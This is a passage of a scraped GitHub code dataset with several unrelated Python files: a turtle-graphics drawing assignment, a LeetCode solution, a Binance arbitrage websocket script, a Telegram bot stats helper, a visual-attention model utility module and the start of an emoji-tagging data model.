_(\"Diploma\")\n","repo_name":"PritamChk/django-custom-user-model-example","sub_path":"testprofile/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24085608234","text":"# -----------------------------------------+\r\n# Andrew Lander |\r\n# CSCI 107, Assignment 3 |\r\n# Last Updated: September 21, 2022 | \r\n# -----------------------------------------|\r\n# This is a drawing of Aang when he's in |\r\n# the iceberg. It also has only an earth |\r\n# symbol - I was hoping to get all of them,|\r\n# but I ran out of time. Oh well! :) | \r\n# -----------------------------------------+\r\n\r\nimport turtle\r\n#initial creation of objects\r\ntortoise = turtle.Turtle()\r\ntortoisex = int(100)\r\ntortoisey = int(100)\r\ntortoiseradius = int()\r\nscreen = turtle.Screen()\r\nscreen.screensize(600,400,\"white\")\r\n#set to rgb color mode\r\nscreen.colormode(255)\r\n#tortoise.hideturtle()\r\n#drawing settings\r\ntortoise.speed(0)\r\n#color is bluish gray\r\ntortoise.color(179,200,229)\r\ntortoise.hideturtle()\r\n#arrow related variables\r\noverallarrowdistance = 17\r\nbottomarrowdistance = 12\r\nsidebitarrowdistance = 6 #name :(\r\n\r\n#function so I don't have to ctrlc-ctrlv all day\r\ndef drawcircle():\r\n tortoise.penup()\r\n tortoise.setposition(tortoisex,tortoisey)\r\n tortoise.pendown()\r\n tortoise.begin_fill()\r\n tortoise.circle(tortoiseradius)\r\n tortoise.end_fill()\r\n\r\n#function to make arrows scalable - should work because it's always moving a distance not scaling sides (hint: it didn't work)\r\n#set x, y, manipulate entirely w angle by encapsulating all of it\r\ndef drawarrow():\r\n tortoise.setposition(tortoisex,tortoisey)\r\n tortoise.begin_fill()\r\n tortoise.pendown()\r\n tortoise.right(90)\r\n tortoise.forward(overallarrowdistance)\r\n tortoise.right(90)\r\n tortoise.forward(sidebitarrowdistance)\r\n tortoise.left(90 + 45) #:^)\r\n tortoise.forward(overallarrowdistance)\r\n tortoise.left(90)\r\n tortoise.forward(overallarrowdistance)\r\n tortoise.left(45 + 90)\r\n tortoise.forward(sidebitarrowdistance)\r\n tortoise.right(90)\r\n tortoise.forward(overallarrowdistance)\r\n tortoise.left(90)\r\n tortoise.forward(bottomarrowdistance)\r\n tortoise.end_fill()\r\n tortoise.penup()\r\n \r\n#actual drawing - try to mostly use built in shapes and x-y coordinate setting\r\n#for loops for drawing continuous rectangles with curved edges\r\n#head\r\ntortoiseradius = 40\r\ndrawcircle()\r\n#left ear\r\ntortoisex = tortoisex - 35\r\ntortoisey = tortoisey + 23\r\ntortoiseradius = 12\r\ndrawcircle()\r\n#right ear\r\ntortoisex = 135\r\ntortoisey = 123\r\ntortoisradius = 12\r\ndrawcircle()\r\n#neck\r\ntortoisex = 75\r\ntortoisey = 90\r\ntortoiseradius = 13\r\nfor i in range(9):\r\n tortoisex += 5\r\n drawcircle()\r\n#left shoulder\r\ntortoisex = 68\r\ntortoisey = 53\r\ntortoiseradius = 24\r\ndrawcircle()\r\n#right shoulder\r\ntortoisex = 132\r\ntortoisey = 53\r\ndrawcircle()\r\n#left arm before elbow\r\ntortoisex = 30\r\ntortoisey = 7\r\ntortoiseradius = 15\r\nfor i in range(8):\r\n tortoisey += 7\r\n tortoisex += 3\r\n drawcircle()\r\n#left arm after elbows \r\ntortoisex = 30\r\ntortoisey = 9\r\nfor i in range(7):\r\n tortoisex += 3\r\n tortoisey -= 1\r\n drawcircle()\r\n#right arm before elbow\r\ntortoisex = 170\r\ntortoisey = 7\r\nfor i in range(8):\r\n tortoisey += 7 \r\n tortoisex -= 3\r\n drawcircle()\r\n#right arm after elbow\r\ntortoisex = 170\r\ntortoisey = 9\r\nfor i in range(7):\r\n tortoisex -= 3\r\n tortoisey -= 1\r\n drawcircle()\r\n#straight line between elbow-elbow\r\ntortoisex = 53\r\ntortoisey = 2\r\nfor i in range(18):\r\n tortoisex += 5\r\n drawcircle()\r\n#fill in torso\r\ntortoisex = 100\r\ntortoisey = 20\r\ntortoiseradius = 50\r\ndrawcircle()\r\ntortoisex = 70\r\ntortoisey = 20\r\ntortoiseradius = 20\r\ndrawcircle()\r\ntortoisex = 130\r\ndrawcircle()\r\n#abdomen (?)\r\ntortoisex = 60\r\ntortoisey = -25\r\ntortoiseradius = 22\r\nfor i in range(15):\r\n tortoisex += 5\r\n drawcircle()\r\n#left leg\r\ntortoisex = 9\r\ntortoisey = -91\r\ntortoiseradius = 25\r\nfor i in range(15):\r\n tortoisex += 6\r\n tortoisey += 2.7\r\n drawcircle()\r\n#right leg\r\ntortoisex = 191\r\ntortoisey = -91\r\nfor i in range(15):\r\n tortoisex -= 6\r\n tortoisey += 2.7\r\n drawcircle()\r\n#straight line again\r\ntortoisex = 60\r\ntortoisey = -67\r\ntortoisradius = 15\r\nfor i in range(12):\r\n tortoisex += 6\r\n drawcircle()\r\n#negative space near abdomen\r\ntortoise.color(255,255,255)\r\ntortoisex = 38\r\ntortoisey = -23.5\r\ntortoiseradius = 14\r\ndrawcircle()\r\ntortoisex = 162\r\ndrawcircle()\r\ntortoise.penup()\r\ntortoisex = 100\r\ntortoisey = 0\r\n#arrow head draw\r\ntortoisex = 94\r\ntortoisey = 179\r\ndrawarrow()\r\n#removal of a bit of line w a circle\r\ntortoisex = 101\r\ntortoisey = 185\r\ntortoiseradius = 5\r\ndrawcircle()\r\n#earth symbol\r\ntortoise.penup()\r\ntortoise.home()\r\ntortoisex = -200\r\ntortoisey = 65\r\ntortoise.setposition(tortoisex,tortoisey)\r\ntortoise.width(5)\r\n#greenish color\r\ntortoise.color(64,203,74)\r\ntortoise.pendown()\r\n#leftside backwards \"E\"\r\ntortoise.forward(30)\r\ntortoise.right(90)\r\ntortoise.forward(12)\r\ntortoise.right(90)\r\ntortoise.forward(34)\r\ntortoise.right(180)\r\ntortoise.forward(34)\r\ntortoise.right(90)\r\ntortoise.forward(12)\r\ntortoise.right(90)\r\ntortoise.forward(46)\r\ntortoise.right(90)\r\ntortoise.forward(12)\r\n#leftside angle bit \r\ntortoise.right(15)\r\ntortoise.forward(80)\r\n#top portion; in middle stop to go down to make spiral\r\ntortoise.right(75)\r\ntortoise.forward(30)\r\n#spiral begin\r\ntortoise.right(90)\r\ntortoise.penup()\r\ntortoise.forward(30)\r\ntortoise.pendown()\r\ntortoise.width(1)\r\ntortoise.left(90)\r\nfor i in range (30):\r\n distanceadd = 0\r\n distanceadd += i/4\r\n tortoise.forward(distanceadd)\r\n tortoise.right(40)\r\n#return back to top line\r\ntortoise.penup()\r\ntortoise.setheading(0)\r\ntortoise.left(180)\r\ntortoise.forward(12)\r\ntortoise.right(90)\r\ntortoise.width(5)\r\ntortoise.forward(32)\r\n#back to drawin da top\r\ntortoise.pendown()\r\ntortoise.right(90)\r\ntortoise.forward(30)\r\n#rightside angle bit \r\ntortoise.right(75)\r\ntortoise.forward(80)\r\ntortoise.right(15)\r\ntortoise.forward(12)\r\n#bottom right side \"E\"\r\ntortoise.right(90)\r\ntortoise.forward(46)\r\ntortoise.right(90)\r\ntortoise.forward(12)\r\ntortoise.right(90)\r\ntortoise.forward(34)\r\ntortoise.right(180)\r\ntortoise.forward(34)\r\ntortoise.right(90)\r\ntortoise.forward(12)\r\ntortoise.right(90)\r\ntortoise.forward(30)\r\nscreen.exitonclick()\r\n","repo_name":"baliiiiiii/csci107-python","sub_path":"andrew-lander-assignment3.py","file_name":"andrew-lander-assignment3.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74118860713","text":"from collections import deque, defaultdict\nfrom functools import lru_cache\n\nMOD = 10 ** 9 + 7\n\n\n# https://leetcode.com/problems/count-different-palindromic-subsequences/discuss/109508/N2-DP-Python-with-Explanation/979094\nclass Solution:\n\n def __init__(self):\n self.forward = deque()\n self.backward = []\n\n def countPalindromicSubsequences(self, s: str) -> int:\n forward_dic = defaultdict(lambda: -1)\n for i in reversed(range(len(s))):\n ch = s[i]\n forward_dic[ch] = i\n self.forward.appendleft(forward_dic.copy())\n\n backward_dic = defaultdict(lambda: -1)\n for i in range(len(s)):\n ch = s[i]\n backward_dic[ch] = i\n self.backward.append(backward_dic.copy())\n\n return self.dp(0, len(s) - 1) - 1\n\n @lru_cache(None)\n def dp(self, forward_index, backward_index):\n if forward_index > backward_index:\n return 1\n\n res = 1\n\n for letter in ('a', 'b', 'c', 'd'):\n next_forward_index = self.forward[forward_index][letter]\n next_backward_index = self.backward[backward_index][letter]\n\n if next_forward_index == -1:\n continue\n\n if next_forward_index > backward_index or next_backward_index < forward_index:\n continue\n\n res += 1\n\n if next_forward_index < next_backward_index:\n res += self.dp(next_forward_index + 1, next_backward_index - 1)\n\n return res % MOD\n","repo_name":"cabulous/leetcode","sub_path":"python/730.py","file_name":"730.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7552042405","text":"import gc\nimport json\nimport queue\nimport time\nimport traceback\nfrom ipcqueue import posixmq\nimport math\nimport matplotlib.pyplot as plt\nimport networkx\nfrom networkx import Graph, DiGraph, simple_cycles\nimport numpy\nimport yaml\nimport unicorn_binance_websocket_api\nfrom binance.client import Client\nfrom threading import Thread\nimport datetime\nclass globalgraph():\n global_graph=False\n global_circular=[]\n FEE = 1.00075\n zero_trading_fee_promo = ['BUSDUSDT', 'TUSDBUSD', 'TUSDUSDT', 'USDCBUSD', 'USDCUSDT', 'USDPBUSD', 'USDPUSDT']\n bitcoin_trading_fee_promo =['BUSDUSDT', 'TUSDBUSD', 'TUSDUSDT', 'USDCBUSD', 'USDCUSDT', 'USDPBUSD', 'USDPUSDT']\n GCCOUNTER_THRESHOLD=600000\n FIFO = '/looppipe12'\n graph = {} # grafo\n def main(self):\n gc.enable()\n with open(\"api.yaml\") as f:\n y = yaml.safe_load(f)\n f.close()\n api_key = y['api']\n api_secret = y['secret']\n pairlist = []\n client = Client(api_key, api_secret)\n exchange_info = client.get_exchange_info()['symbols']\n real_pair_listed = [pair['symbol'] for pair in exchange_info]\n exchange_info = exchange_info[:50]\n print(len(exchange_info))\n exchange_info = [item for item in exchange_info if 'EUR' not in item['symbol']]\n print(len(exchange_info))\n self.tab = {} #dati\n self.bookdepthdf={} #bookdepth\n coinlist = self.returncoinlist(exchange_info)\n print(len(coinlist))\n time.sleep(5)\n for coin1 in coinlist:\n self.tab[coin1] = {}\n self.bookdepthdf[coin1] = {}\n for coin2 in coinlist:\n self.tab[coin1][coin2] = numpy.NAN\n self.bookdepthdf[coin1][coin2] = numpy.NAN\n pairlist.append(coin1 + '.' + coin2)\n\n i = 0\n\n print(len(pairlist))\n bnb_wss_taker = Thread(target=\n self.threaded_func,\n args=(pairlist,))\n bnb_wss_taker.start()\n pairlist = []\n i = 0\n self.q=posixmq.Queue(self.FIFO)\n Thread(target=self.grapher,args=(self.graph,)).start()\n time.sleep(100)\n print(real_pair_listed)\n self.triangle_calculator( real_pair_listed)\n\n\n def returncoinlist(self,exchangeinfo):\n partial_list = []\n for pair in exchangeinfo:\n partial_list.append(pair['baseAsset'])\n partial_list.append(pair['quoteAsset'])\n return list(set(partial_list))\n\n def triangle_calculator(self,pairlist):\n while True:\n print('graph2',self.graph)\n if not globalgraph.global_graph or globalgraph.global_graph!=self.graph:\n print(\"[!] Redrawing graph...\")\n G = Graph(self.graph)\n labels = dict(zip(G.nodes(), G.nodes()))\n networkx.draw_networkx(G, labels=labels)\n DG = DiGraph(G)\n circular = list(simple_cycles(DG))\n closed_loop_list = [loop for loop in circular if len(loop) == 3]\n globalgraph.global_graph=self.graph\n globalgraph.global_circular=circular\n else:\n closed_loop_list = [loop for loop in globalgraph.global_circular if len(loop) == 3]\n print(f\"loops max 3 found{closed_loop_list} length loop {len(closed_loop_list)}\")\n #loop_calculator(df,closed_loop_list[0],pairlist,handle)\n for loop in closed_loop_list:\n #Thread(target=loop_calculator,args=(df,loop,pairlist,q,bookdepthdf)).start()\n self.loop_calculator(loop,pairlist)\n\n def loop_calculator(self,loop,pairlist):\n try:\n \"\"\"['ETH', 'BTC', 'EUR'] => [\"ETHBTC\", \"BTCEUR\", \"EURETH\"]\"\"\"\n pairs = [[loop[0],loop[1]],[loop[1],loop[2]],[loop[2],loop[0]]]\n prices=[]\n depths=[]\n margin =0.0\n for pair in pairs:\n if self.isfloat(self.tab[pair[0]][pair[1]]):\n #print(\"Testing\",pair[0]+pair[1])\n if pair[0]+pair[1] in pairlist:\n margin += math.log(float(self.tab[pair[1]][pair[0]]))\n depths.append(self.bookdepthdf[pair[1]][pair[0]])\n prices.append(self.tab[pair[1]][pair[0]])\n if pair[0]+pair[1] in self.zero_trading_fee_promo or pair[1]+pair[0] in self.zero_trading_fee_promo or pair[0]+pair[1] in self.bitcoin_trading_fee_promo or pair[1]+pair[0] in self.bitcoin_trading_fee_promo:\n margin-= 0\n else:\n margin-= 0.00075\n else:\n margin += -math.log(float(self.tab[pair[1]][pair[0]]))\n depths.append(self.bookdepthdf[pair[1]][pair[0]])\n prices.append(self.tab[pair[1]][pair[0]])\n if pair[0]+pair[1] in self.zero_trading_fee_promo or pair[1]+pair[0] in self.zero_trading_fee_promo or pair[0]+pair[1] in self.bitcoin_trading_fee_promo or pair[1]+pair[0] in self.bitcoin_trading_fee_promo:\n margin-= 0\n else:\n margin-= 0.00075\n print(\"Loop %s\\t\\tMargin %f%%\"%(str(loop),margin*100))\n api_message_push = {'loop':pairs,'margin':round(margin*100,5),'prices':prices,'depths':depths,'timestamp':int(datetime.datetime.now().timestamp())}\n if float(api_message_push['margin'])>0:\n with open('timestamplog','a') as f:\n f.write(f\"Timestamp rilevated on websocketgroup: {datetime.datetime.now().timestamp()}\\n\")\n self.q.put(str(api_message_push))\n except Exception as e:\n with open('culo.txt','a') as f:\n f.write(str(traceback.format_exc()))\n\n def pair_list_slimmer(self,pair_list, pair):\n new_pair_list = []\n for second_pair in pair_list:\n if pair.split('.')[0] in second_pair or pair.split('.')[1] in second_pair:\n new_pair_list.append(second_pair)\n new_pair_list.remove(pair)\n return new_pair_list\n\n def isfloat(self,num):\n try:\n float(num)\n return True\n except ValueError:\n return False\n\n def grapher(self,graph):\n print('Grapher started...')\n while True:\n G=Graph(graph)\n labels = dict(zip(G.nodes(),G.nodes()))\n networkx.draw_networkx(G,labels=labels)\n DG = DiGraph(G)\n plt.show()\n\n\n\n\n def subscribe_wss(self,api_manager, pairlist):\n stream=[item.lower().replace('.','') for item in pairlist]\n print('sublen %d firstdata %s'%(len(stream),stream[0]))\n api_manager.create_stream(channels=['bookTicker'],markets=stream)\n\n\n def threaded_func(self, pairlist):\n print('Starting WSS connection')\n binance_websocket_api_manager = unicorn_binance_websocket_api.BinanceWebSocketApiManager(exchange=\"binance.com\")\n withoutpoint_topoint = dict()\n Thread(target=self.subscribe_wss, args=(binance_websocket_api_manager, pairlist)).start()\n for pair in pairlist:\n print('Create stream for %s' % (pair.replace('.', '')))\n withoutpoint_topoint[pair.replace('.', '')] = pair\n while True:\n try:\n oldest_stream_data_from_stream_buffer = binance_websocket_api_manager \\\n .pop_stream_data_from_stream_buffer()\n if oldest_stream_data_from_stream_buffer:\n res_bnb = oldest_stream_data_from_stream_buffer\n if 'result' not in res_bnb:\n # conn.sendall(res_bnb.encode())\n # print(res_bnb)\n try:\n if not self.graph[withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[0]].__contains__(\n withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[\n 1]):\n self.graph[withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[0]].append(\n withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[\n 1])\n except:\n self.graph[withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[0]] = []\n\n self.tab[withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[0]][\n withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[\n 1]] = json.loads(res_bnb)['data']['a']\n self.tab[withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[1]][\n withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[\n 0]] = json.loads(res_bnb)['data']['b']\n self.bookdepthdf[withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[0]][\n withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[\n 1]] = json.loads(res_bnb)['data']['A']\n self.bookdepthdf[withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[1]][\n withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[\n 0]] = json.loads(res_bnb)['data']['B']\n\n else:\n continue\n except:\n continue\n\n\n def log(self,trace, print_flag=False):\n if print_flag:\n print(trace)\n with open('emakerlog', 'a+') as file:\n file.write(\n str(datetime.datetime.now().astimezone()) + \" VVVVVVVVVVVVVVVVVVVVVVV\\n\" + trace + '\\n\\n')\n\ndef go():\n g=globalgraph()\n g.main()\nif __name__ == \"__main__\":\n print('ok')\n #sys.stderr = object\n q1 = queue.Queue()\n go()","repo_name":"701789262a/triangular","sub_path":"websocketgroup.py","file_name":"websocketgroup.py","file_ext":"py","file_size_in_byte":10153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41793047116","text":"# -*- coding: utf-8 -*-\n# __author__: musibii\n# __file__ : test1.py\n# __time__ : 2020/4/29 11:05 上午\n\nimport rbac.acl\nacl = rbac.acl.Registry()\n\nacl.add_role()\nacl.add_resource(acl)\n\nacl.allow()\nacl.deny()\n\nacl.is_allowed()\n","repo_name":"zuanzuanshao/ModuleStudy","sub_path":"permissions/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33446399356","text":"import os\nimport time\n\nimport psutil\n\nfrom DaisyX import bot_start_time\n\nfrom .utils import formatter\n\n\nasync def bot_sys_stats():\n bot_uptime = int(time.time() - bot_start_time)\n cpu = psutil.cpu_percent()\n mem = psutil.virtual_memory().percent\n disk = psutil.disk_usage(\"/\").percent\n process = psutil.Process(os.getpid())\n stats = f\"\"\"\n{USERBOT_USERNAME}@William\n------------------\nUPTIME: {formatter.get_readable_time((bot_uptime))}\nBOT: {round(process.memory_info()[0] / 1024 ** 2)} MB\nCPU: {cpu}%\nRAM: {mem}%\nDISK: {disk}%\n\"\"\"\n return stats\n","repo_name":"MatheeshaOfficial/Hermione-old","sub_path":"DaisyX/modules/states.py","file_name":"states.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"26502376865","text":"import timeit\nimport time\nimport os\nimport math\nimport numpy as np\nfrom PIL import Image\nfrom scipy.io import loadmat\n\nfrom VIS_parameters import params\nfrom VIS_ParamVR import ModelParam\nfrom VIS_VisualVR import Highlight\n\n\ndef CalculatePanTilt(SaccStart_Px, SaccStop_Px):\n '''\n Calculate Pan and Tilt for agent's saccade in VR.\n\n params: SaccStart_Px -- numpy array with coordinates of Saccade's start point in pixel\n SaccStop_Px -- numpy array with coordinates of Saccade's stop point in pixel\n\n return: Pan -- scalar value with amount of Pan in Degree\n Tilt -- scalar value with amount of Tilt in Degree\n '''\n\n Alpha_Deg = 102. / 2.\n Alpha_Rad = Alpha_Deg * math.pi / 180.\n Half_Width = ModelParam['resIm'][0] / 2.\n Eye_VF_Distance = Half_Width / math.tan(Alpha_Rad)\n\n Pan_AlphaT_Rad = math.atan((SaccStop_Px[0] - SaccStart_Px[0]) / Eye_VF_Distance)\n Pan_AlphaT_Deg = Pan_AlphaT_Rad * 180. / math.pi\n Pan = Pan_AlphaT_Deg # round(Pan_AlphaT_Deg)\n\n Alpha_Deg = 77. / 2.\n Alpha_Rad = Alpha_Deg * math.pi / 180.\n Half_Width = ModelParam['resIm'][1] / 2.\n Eye_VF_Distance = Half_Width / math.tan(Alpha_Rad)\n\n Tilt_AlphaT_Rad = math.atan((SaccStart_Px[1] - SaccStop_Px[1]) / Eye_VF_Distance)\n Tilt_AlphaT_Deg = Tilt_AlphaT_Rad * 180. / math.pi\n Tilt = Tilt_AlphaT_Deg # round(Tilt_AlphaT_Deg)\n\n return Pan, Tilt\n\n\ndef CheckWithMATLAB(rV1C):\n '''\n In debug mode (ModelParam['Debug_Mode'] = True) one can use this function to compare the result\n of preprocessing of Python and Matlab.\n\n params: rV1C -- numpy array containing rate of V1-Complex neurons (pre-processed image)\n '''\n\n MATLAB_rV1C = loadmat(ModelParam['DataDir'] + 'rV1CS.mat')['rV1C']\n\n if np.max(np.abs(rV1C-MATLAB_rV1C)) > 0.0001:\n print(\"\\n\", Highlight('Warning: Matlab and Python make different results in pre-processing phase.',\n 'Yellow', Bold = True))\n else:\n print(\"\\n\", Highlight('Matlab and Python make same results in pre-processing phase.',\n 'Green', Bold = True))\n\n\ndef CoG(A):\n '''\n calculate Center of Gravity (CoG) of an array\n\n params: A -- array\n\n return: Centers -- numpy array with coordinates of Center of Gravity\n '''\n\n rc, cc = np.mgrid[0:A.shape[0], 0:A.shape[1]]\n Mt = sum(sum(A))\n Centers = np.zeros(2)\n Centers[0] = sum(sum(A * rc)) / Mt\n Centers[1] = sum(sum(A * cc)) / Mt\n\n return Centers\n\n\ndef MakeMovie(ShowMovie=False, DeleteFrames=True):\n '''\n After completion of the simulation and if ModelParam['Make_Movie'] is True, some numbered\n png files (e.g. 0000.png, 0001.png, 0002.png, ...) should be generated as single frames of a\n movie. This function, first makes such single frames based on saved images and then, uses a\n Linux instruction (ffmpeg) to make a movie from these single frames.\n\n params: ShowMovie -- show the Movie immediately after simulation\n default: False\n DeleteFrames -- delete genereted (remaned) png files\n default: True\n '''\n\n # Change the current directory to the results directory.\n CurrentDir = os.getcwd()\n os.chdir(ModelParam['ResultDir'])\n\n # The following for loop makes frames based on saved image files.\n # It's basically a renaming\n for entry in os.scandir('./'):\n StFilename = entry.path\n if ModelParam['OutputFileName'] in StFilename:\n step = int(StFilename.split('_')[-1][:-4])\n FrFilename = \"{:>04d}.png\".format(step)\n Frame = Image.open(StFilename)\n Frame.save(FrFilename)\n\n # Delete the old probable movie with the same filename.\n MovFilename = ModelParam['Movie_Filename'] + ModelParam['OutputFileName'].split('_')[-2] + '.mp4'\n Movie_File = open(MovFilename, 'w')\n Movie_File.close()\n St = 'rm ' + MovFilename\n os.system(St)\n\n St = 'ffmpeg -framerate 2 -i %04d.png -r 30 -pix_fmt yuv420p ' + MovFilename\n os.system(St)\n\n # Delete the frames after making the movie file (by default).\n if DeleteFrames:\n os.system('rm 0*.*')\n\n # Delete the saved graphical results.\n if not ModelParam['SaveImagesInOneFile']:\n St = 'rm ' + ModelParam['OutputFileName'] + '*.png'\n os.system(St)\n\n # Show the movie on demand.\n if ShowMovie:\n St = 'ffplay ' + MovFilename\n os.system(St)\n\n os.chdir(CurrentDir) # Back to the previous directory.\n\n\ndef PFCObj(ObjNo):\n '''\n return proper value of PFC based on what is already saved in Object Memory (OM).\n OM is a matrix which is saved in a *.mat file.\n\n params: ObjNo -- integer number in [0, 14] interval\n\n return: OBJ -- vector which retrieved from Object Memory and should be assigned to the PFC\n '''\n\n OBJ = loadmat(params['path_weightMat'])['OM'][ObjNo].astype(float)\n print(Highlight('The PFC is:', 'Yellow', Bold = True))\n print(OBJ)\n print(Highlight('----------------------------------------------------------------------------------------------------', 'Yellow', Bold = True))\n return OBJ\n\n\ndef ProgramEnd(First_Start):\n '''\n Generate message about whole time consumed during simulation and then ends the program safely\n\n params: First_Start -- start time of simulation\n '''\n Last_Stop = timeit.default_timer()\n if ModelParam['Make_Movie']:\n MakeMovie()\n print(Highlight('\\n----------------------------------------------------------------------------------------------------', 'Red', Bold = True))\n print(Highlight('The whole simulation has been finished in %f seconds.' % (Last_Stop-First_Start),\n 'Green', Bold=True))\n print(Highlight('Press Enter to quit.', 'Red', Bold=True))\n\n\ndef ReadImageFromVR(annarInterface):\n '''\n Read an image from VR agent's left eye\n\n params: annarInterface -- ANNarchy Interface\n\n return: LImage -- numpy array of shape (height, width, 3) with values from 0 to 1\n containing Left Image received from VR\n '''\n\n ret = False\n while not ret:\n ret = annarInterface.checkImages()\n\n Tmp = annarInterface.getImageLeft()\n LImage = np.array(Tmp) / 255.\n LImage = LImage / LImage.max()\n\n return LImage\n\ndef SaccadeControl_new(rFEFm, FEFfix, FinishCounter, Step):\n '''\n Determining if the saccade should be run or not based on the rates of neurons in FEFm layer.\n If maximum value of FEFm neurons is bigger than a threshold, the new saccade coordinates will be\n calculated.\n\n params: rFEFm -- current firing rates of FEF Movement Layer\n '''\n\n CurSac = np.asarray([0, 0])\n NewSac = False\n LowResponse = 0.8\n if FinishCounter == -1:\n Max_Row, Max_Col = np.unravel_index(rFEFm.argmax(), rFEFm.shape)\n MaxFEFm = rFEFm[Max_Row, Max_Col]\n\n if MaxFEFm > ModelParam['SaccadeThreshold']:\n print(Highlight('\\nAfter step ' + str(Step + 1) + ' Max(FEFm) = ' + str(MaxFEFm),\n 'Green', Bold=True))\n St = 'Max_Row = ' + str(Max_Row) + '\\tMax_Col = ' + str(Max_Col)\n print(Highlight(St, 'Green', Bold=True))\n rFEFm[rFEFm < LowResponse * ModelParam['SaccadeThreshold']] = 0\n CurSac = CoG(rFEFm)\n print(\"Eye position should be on: \", np.round(CurSac + 1, 2))\n NewSac = True\n #FinishCounter = 20\n FEFfix.r = 1.0\n else:\n FinishCounter -= 1\n return FinishCounter, NewSac, CurSac\n\n\ndef TargetName(TNo):\n '''\n return proper name based on what already saved in object memory\n\n params: TNo -- integer of Target Number\n\n return: string containing corresponding name\n '''\n\n namePerNo = {0: \"Yellow Crane\", 1: \"Green Crane\", 2: \"Green Race Car\", 3: \"Blue Book\",\n 4: \"Yellow Duck\", 5: \"Red Pencil\", 6: \"Blue Pencil\", 7: \"Green Pencil\",\n 8: \"Dummy\", 9: \"Painting\", 10: \"Red Car\", 11: \"Green Car\", 12: \"Teddy Bear\",\n 13: \"Yellow Truck\", 14: \"Green Ball\"}\n\n return namePerNo[TNo]\n\n\ndef waitTillExecuted(annarInterface, ID, timeout = -1):\n '''\n wait until one action in VR would be executed\n\n params: annarInterface -- ANNarchy Interface\n ID -- action ID\n timeout -- default: -1 (function waits for the Action State. could be infinity!)\n\n return: actionState -- Action State\n '''\n\n ret = False\n actionState = 0\n\n if timeout == -1:\n\n while actionState == 0:\n ret = annarInterface.checkActionExecState(ID)\n if ret:\n actionState = annarInterface.getActionExecState()\n return actionState\n\n # else\n start_time = time.time()\n dur = 0\n while (actionState == 0) and dur < timeout:\n dur = time.time() - start_time\n ret = annarInterface.checkActionExecState(ID)\n if ret:\n actionState = annarInterface.getActionExecState()\n\n if dur >= timeout:\n print(\"Timeout\")\n\n return actionState","repo_name":"hamkerlab/Burkhardt2023_SpatialCognition","sub_path":"VIS/VIS_MainHelperVR.py","file_name":"VIS_MainHelperVR.py","file_ext":"py","file_size_in_byte":9104,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"33091426867","text":"# -*- coding: utf-8 -*-\n\n\nfrom google.appengine.ext import ndb\nfrom google.appengine.api import urlfetch\nimport webapp2\n\nimport json\n\nimport logging\nimport parameters\nimport person\nimport emojiTables\nimport utility\nimport languages\n\nfrom collections import defaultdict\n\n\n###################\n# MAIN CLASS Tagging\n###################\n\nclass UserTagging(ndb.Model):\n # id = lang_code chat_id\n timestamp = ndb.DateTimeProperty(auto_now=True)\n chat_id = ndb.IntegerProperty()\n lang_code = ndb.StringProperty()\n ongoingAlreadyTaggedEmojis = ndb.IntegerProperty(default=0) #number of emoji given to user already tagged by other useres\n ongoingUpperCaseTags = ndb.IntegerProperty(default=0)\n last_emoji = ndb.StringProperty()\n emojiTagsTable = ndb.PickleProperty()\n disableDiacriticsWarning = ndb.BooleanProperty(default=False)\n # emoji -> tag\n\n def wasEmojiTagged(self, emoji_utf):\n #emoji_uni = emoji_utf.decode('utf-8')\n #return self.emojiTagsTable.has_key(emoji_uni)\n return self.emojiTagsTable.has_key(emoji_utf)\n\n def getNumberOfTaggedEmoji(self):\n return len(self.emojiTagsTable)\n\n def setLastEmoji(self, emoji, random):\n self.last_emoji = emoji\n if random:\n self.ongoingAlreadyTaggedEmojis = 0\n else:\n self.ongoingAlreadyTaggedEmojis += 1\n self.put()\n\n def getLanguageCode(self):\n return self.lang_code.encode('utf-8')\n\n def getLastEmoji(self):\n if self.last_emoji:\n return self.last_emoji.encode('utf-8')\n return None\n\n def removeLastEmoji(self, put=False):\n self.last_emoji = ''\n if put:\n self.put()\n\n def addTagsToLastEmoji(self, tags, put=False):\n last_emoji_utf = self.getLastEmoji()\n self.emojiTagsTable[last_emoji_utf] = tags\n if put:\n self.put()\n\n def currentLanguageHasRomanLetters(self):\n return languages.isRomanScript(self.getLanguageCode())\n\n def currentLanguageHasDiacritics(self):\n return languages.hasDiacritics(self.getLanguageCode())\n\n def updateUpperCounts(self, tag, put=False):\n if self.currentLanguageHasRomanLetters():\n self.updateTagUpperCount(tag)\n if put:\n self.put()\n\n # returns\n # 0 (more than x consecutive non-upper cases),\n # 1 (less than x consectuve upper-cases),\n # 2 (more than x consecutive upper-cases)\n def updateTagUpperCount(self, tag):\n if tag[0].isupper():\n if self.ongoingUpperCaseTags < 0:\n self.ongoingUpperCaseTags = 0\n else:\n self.ongoingUpperCaseTags += 1\n else:\n if self.ongoingUpperCaseTags > 0:\n self.ongoingUpperCaseTags = 0\n elif self.ongoingUpperCaseTags > 